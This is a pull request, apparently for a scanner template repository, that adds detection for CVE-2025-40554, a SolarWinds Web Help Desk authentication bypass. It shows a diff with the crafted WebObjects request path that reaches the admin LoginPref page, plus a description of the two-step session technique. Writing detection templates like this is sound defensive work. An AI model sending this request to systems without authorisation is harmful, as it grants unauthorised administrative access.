### PR TITLE
Add CVE-2025-40554 SolarWinds WHD Auth Bypass

### DIFF
--- a/http/cves/2025/CVE-2025-40554.yaml
+++ b/http/cves/2025/CVE-2025-40554.yaml
@@ -48,7 +48,6 @@ http:
         GET /helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AAAAAAAAAAAAAAAAAAAAAA/1.0?badparam=/ajax/&wopage=LoginPref HTTP/1.1
         Host: {{Hostname}}
 
-    cookie-reuse: true
     matchers-condition: and
     matchers:
       - type: dsl


### PR DESCRIPTION
### PR Information

- Added CVE-2025-40554 — SolarWinds Web Help Desk authentication bypass via WebObjects session path manipulation
- References:
  - https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40554
  - https://nvd.nist.gov/vuln/detail/CVE-2025-40554
  - https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Two-step template: first request grabs a JSESSIONID, second request uses a manipulated WebObjects path to bypass auth and access the admin LoginPref configuration page. Tested on live instances — vulnerable versions (12.7.x) return admin config content with `externalAuthContainer`, patched versions return the login page.